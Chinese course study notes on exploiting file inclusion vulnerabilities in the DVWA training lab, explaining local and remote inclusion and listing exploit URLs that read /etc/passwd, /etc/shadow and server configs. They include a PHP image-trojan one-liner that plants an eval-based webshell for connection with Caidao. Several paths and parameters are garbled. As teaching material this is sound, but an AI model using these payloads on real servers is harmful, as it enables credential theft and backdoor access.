文件包含漏洞渗透攻击_2 | 学习笔记

简介: 快速学习 文件包含漏洞渗透攻击_2

开发者学堂课程【网络安全攻防 - Web渗透测试文件包含漏洞渗透攻击_2学习笔记,与课程紧密联系,让用户快速学习知识。

课程地址:https://developer.aliyun.com/learning/course/630/detail/9902


文件包含漏洞渗透攻击_2


内容介绍

一、  项目实验环境

二、  原理及危害

三、  低安全级别渗透


一、  项目实验环境

首先访问服务器,如下图:

image.png

http://172.16.70.214/dvwa/f/?page=/etc/passwd是本地文件;

http://172.16.70.214/dvwa/fi/?page=http://rémote.com/1.txt是远程文件。


二、原理及危害

文件包含漏洞:

即 File Inclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include 选项时,就可以通过 php 的某些特性函数(include(),require()和include_once(),require_once())利用 url 去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。

image.png

文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了 php 配置中的allow_url_fopen 选项(选项开启之后,服务器允许包含一个远程的文件)

服务器通过 php 的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到自己的目的。

image.png

1) 文件包含(File Inclusion)即程序通过[包含函数]调用本地或远程文件,以此来实现拓展功能;

2) 被包含的文件可以是各种文件格式,而当文件里面包含恶意代码,则会形成远程命令执行或文件上传漏洞;

3) 文件包含漏洞主要发生在有包含语句的环境中,例如 PHP 所具备 include、require 等包含函数。

文件包含分为两类:

1) 本地文件包含LFI(Local File Inclusion) 当被包含的文件在服务器本地时,就形成本地文件包含;

2) 远程文件包含RFI(Remote File Inclusion)当被包含的文件在第三方服务器时,叫做远程文件包含。


三、低安全级别渗透

1.本地文件包含

访问本地系统账号信息及其它敏感信息

http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/passwd  

http://192.168.106.134/dvwa/vulnerabilities/fi/?page-/etc/shadow  

http://192.168.106.134/dvwa/vulnerabilities/fi/?page-/etc/php5/.pache2/pho.ini  

http://192.168.166.134/dvwa/vulnerabilities/fi/?page-/etc/my5ql/my.cnf  

http://192.168.106.134/dvwa/vulnerabilities/f1/?page-/etc/apache2/apache2.conf

2.本地文件包含+webshell

步骤:

1) 制作一句话图片木马 e.g.yangge.jpg

<?fputs(fopen(“shel120.php”,"w"),'<?php eval($_POST[yangge]);?>*)?>

2) 上传图片木马文件

3) 执行文件包含并生成后门

4) 通过菜刀连接 webshell

image.png

提示:

/var/www/dvwa/hackable/uploads   //dvwa 文件上传访问的目录

/var/www/dvwa/vulnerab11itles/f1   //dvwa 文件包含访问的目录

相关文章
|
4月前
|
传感器 机器学习/深度学习 Oracle
2025如何通过智能物资管理工具实现降本增效?核心功能实现路径!
本文探讨了基于物联网与决策科学的现代物资管理系统架构,分析了物资管理工具从静态台账向智能中枢演进的技术路径。通过“感知-决策-执行”三层架构、多模态感知与自适应预测等关键技术,实现库存优化与智能调度。结合主流工具选型与实施策略,揭示物资管理向自感知、自优化方向发展的未来趋势。
244 0
|
2月前
|
存储 SQL 机器学习/深度学习
sentieon | 泛基因组分析流程详解
泛基因组:指的是一个物种所有个体中全部基因的集合。它不再依赖于单个参考基因组,而是承认没有任何一个个体能够拥有其物种的全部基因。
221 1
|
5月前
|
API
Dataphin功能Tips系列(64)-API资产编目及上架
在企业数据部门中,因API命名不规范、分类不清、信息不全等问题,导致业务开发人员查找困难、重复咨询、误用接口等,影响效率。Dataphin提供API资产编目与上架功能,通过目录规划、属性管理、手动/自动上架等方式,实现API的系统化管理与精准检索,提升业务响应效率。
136 0
|
NoSQL 网络协议 Linux
卡速售电商系统2.0搭建教程(详细图文版)
本文详细介绍了在Linux服务器上(推荐CentOS 7.x / Ubuntu 20.04)使用宝塔面板安装和配置卡速售的安装及配置过程,包括安装PHP 8.0及其扩展(fileinfo、redis、swoole4)、调整内存限制、配置二进制日志等。同时提供了安装系统程序的具体步骤,如添加站点、上传并解压文件、设置运行目录及伪静态规则,并通过进程守护管理器启动程序。最后附有故障排查指导,确保安装顺利进行。
452 5
|
存储 固态存储 芯片
计算机中内存与存储
【7月更文挑战第28天】
2604 1
|
SQL 关系型数据库 数据库连接
Python 连接 SQL 数据库 -pyodbc
以下是如何在 Python 中使用 pyodbc 连接到 SQL 数据库的基本步骤和详解
733 0
|
数据采集 分布式计算 Oracle
数据仓库的分层架构与演进
分层架构很容易在各种书籍和文档中去理解,但是把建模方法和分层架构放在一起就会出现很多困惑了。接下来,我会从数据研发与建模的角度,演进一下分层架构的设计原因与层次的意义。
16657 3
数据仓库的分层架构与演进
|
机器学习/深度学习 编解码
可变卷积原理总结
可变卷积原理总结
371 0
|
Windows
Windows 有一个非常好用的功能,用好它可以「多活 100 年」
Windows 有一个非常好用的功能,用好它可以「多活 100 年」
395 0
|
JavaScript 数据可视化 开发者
Pywebio 快速构建web应用 | Python 主题月
Pywebio 快速构建web应用 | Python 主题月
1256 0